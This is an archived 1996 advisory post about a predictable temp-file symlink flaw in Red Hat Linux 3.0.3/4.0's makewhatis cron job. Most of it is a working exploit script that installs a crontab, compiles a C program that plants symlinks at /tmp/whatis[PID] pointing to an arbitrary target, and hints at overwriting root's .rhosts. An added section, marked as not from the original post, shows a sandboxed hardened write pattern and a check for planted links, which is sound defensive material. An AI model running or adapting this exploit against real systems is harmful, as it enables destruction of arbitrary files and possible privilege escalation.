Linux Redhat 4.0/3.0.3 makewhatis cron job



There is a serious problem with the makewhatis cronjob under Redhat Linux 
4.0/3.0.3.  You can use it to overwrite any file on the system.  Redhat 
is aware of the problem, and said they would have some kind of fix by 
next week which should be plenty of time before this bug is exploitable 
again.

#!/bin/sh
#
# blowitawaysam
#
# makewhatis is a shellscript that stores a tmp copy of the whatis
# database in /tmp/whatis[PID].  This is easily predictable, and even
# more easily brute forced.
#
# really silly script to blow away a file on redhat 3.0.3/4.0 system
# with makewhatis in /etc/crontab.  Severely limited as you can only
# overwrite one file a week with the whatis database.
#
# If someone is really clever, maybe they can overwrite ~root/.rhosts
# and try IP spoofing in from 'cat' as user '(1)' <smirk>
#
# Dave G.
# <daveg escape com>
# http://www.escape.com/~daveg
# 12/21/96

NUMLINKS=100 # I don't feel like guessing.  This will hit it.
             # Admittedly, it has as much style as a clumsy leper.

if [ -x /usr/bin/crontab ] ; then
   cat << ! > evil_cron
# These are for 3.0.3
19 03 * * 1 $PWD/overwrite $1 $NUMLINKS
00 04 * * 1 /bin/rm -f /tmp/whatis* $PWD/overwrite
# These are for 4.0
00 02 * * 0 $PWD/overwrite $1 $NUMLINKS
00 03 * * 0 /bin/rm -f /tmp/whatis* $PWD/overwrite
!

   /usr/bin/crontab evil_cron > /dev/null 2>&1
   if [ $? -ne 0 ] ; then
      echo "You are in cron.deny.  Gonna have to do it yourself."
      exit 1
   fi
   

   cat << ! > overwrite.c
   #include <stdio.h>
   #include <stdlib.h>   /* atoi */
   #include <unistd.h>

   int main(int argc, char **argv)
   {
      int i,t, really;
      pid_t sucks;
      char alot[100];

      t=atoi(argv[2]);
      sucks=getpid();
      for ( i=0 ; i<t ; i++ )
      {
         really = sucks + i;
         sprintf(alot, "/tmp/whatis%d", really); 
         symlink(argv[1], alot);
      }
   }
!
   
   cc -O6 -o overwrite overwrite.c
   chmod 755 $PWD/overwrite
   rm overwrite.c evil_cron
   
   echo Everything is set up.  Leave the program overwrite exactly where it is.
   echo now you just have to wait till sunday for 4.0 or monday for 3.0.3.
else
   echo no cron for you.
fi


Dave G.
<daveg escape com>
http://www.escape.com/~daveg
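
Added example, not part of the original post and not Red Hat's fix: the predictable /tmp/whatis[PID] write pattern described above next to a hardened form, plus a check for links planted at that name. The function names, the "db" file name and the sandbox layout are assumptions made for illustration, and the sample data is constructed.

```shell
#!/bin/sh
# Added example, not from the original post. Every path is inside a
# throwaway sandbox from mktemp(1); the real /tmp is never touched.

# Pattern the post describes: fixed prefix plus PID, opened with a plain
# redirect, which follows a symlink already sitting at that name.
write_predictable() {   # $1 = scratch dir, $2 = data
    printf '%s\n' "$2" > "$1/whatis$$"
}

# Hardened form: mktemp -d makes a randomly named 0700 directory, and
# noclobber (set -C) makes the redirect refuse any pre-existing name.
write_private() {       # $1 = scratch dir, $2 = data; prints the file path
    dir=$(mktemp -d "$1/whatis.XXXXXX") || return 1
    ( set -C; printf '%s\n' "$2" > "$dir/db" ) || return 1
    printf '%s\n' "$dir/db"
}

# Check a cron wrapper or audit job can run first: symlinks named whatis*
# directly inside the scratch directory.
planted_links() {       # $1 = scratch dir
    find "$1" -maxdepth 1 -name 'whatis*' -type l
}

# Constructed scenario: a stand-in target file and a link at the
# predictable name, then both write patterns run against it.
demo() {
    sb=$(mktemp -d) || return 1
    mkdir "$sb/tmp"
    echo "original contents" > "$sb/target"
    ln -s "$sb/target" "$sb/tmp/whatis$$"
    echo "links found: $(planted_links "$sb/tmp")"
    write_predictable "$sb/tmp" "whatis database"
    echo "target after predictable write: $(cat "$sb/target")"
    echo "original contents" > "$sb/target"
    out=$(write_private "$sb/tmp" "whatis database") || return 1
    echo "private scratch file: $out"
    echo "target after private write: $(cat "$sb/target")"
    rm -rf "$sb"
}

demo
```

Current Linux kernels add a second layer with the fs.protected_symlinks sysctl, which stops a process from following another user's symlink in a sticky world-writable directory.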


